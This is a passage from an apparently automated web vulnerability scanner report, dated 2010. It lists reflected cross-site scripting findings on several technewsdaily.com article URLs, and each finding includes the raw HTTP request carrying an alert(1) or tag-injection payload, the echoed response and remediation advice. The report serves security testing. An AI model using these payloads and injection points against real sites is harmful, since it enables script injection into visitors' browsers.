Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/?53950"><a>7c673f395e9=1/" />
...[SNIP]...

1.202. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /wave-of-spam-surrounds-new-harry-potter-movie-1450/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd02'-alert(1)-'c8d16eb49db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wave-of-spam-surrounds-new-harry-potter-movie-1450/?2dd02'-alert(1)-'c8d16eb49db=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63055

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/?2dd02'-alert(1)-'c8d16eb49db=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.203. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /what-is-an-rss-feed--0813/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b8b3'-alert(1)-'188f08f1588 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /what-is-an-rss-feed--08138b8b3'-alert(1)-'188f08f1588/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40448

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/what-is-an-rss-feed--08138b8b3'-alert(1)-'188f08f1588/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.204. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /what-is-an-rss-feed--0813/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5634f"><a>97ac2df990 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /what-is-an-rss-feed--0813/?5634f"><a>97ac2df990=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62922

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/what-is-an-rss-feed--0813/?5634f"><a>97ac2df990=1/" />
...[SNIP]...

1.205. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /what-is-an-rss-feed--0813/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b25a'-alert(1)-'f4517bebcde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /what-is-an-rss-feed--0813/?5b25a'-alert(1)-'f4517bebcde=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62590

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/what-is-an-rss-feed--0813/?5b25a'-alert(1)-'f4517bebcde=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...
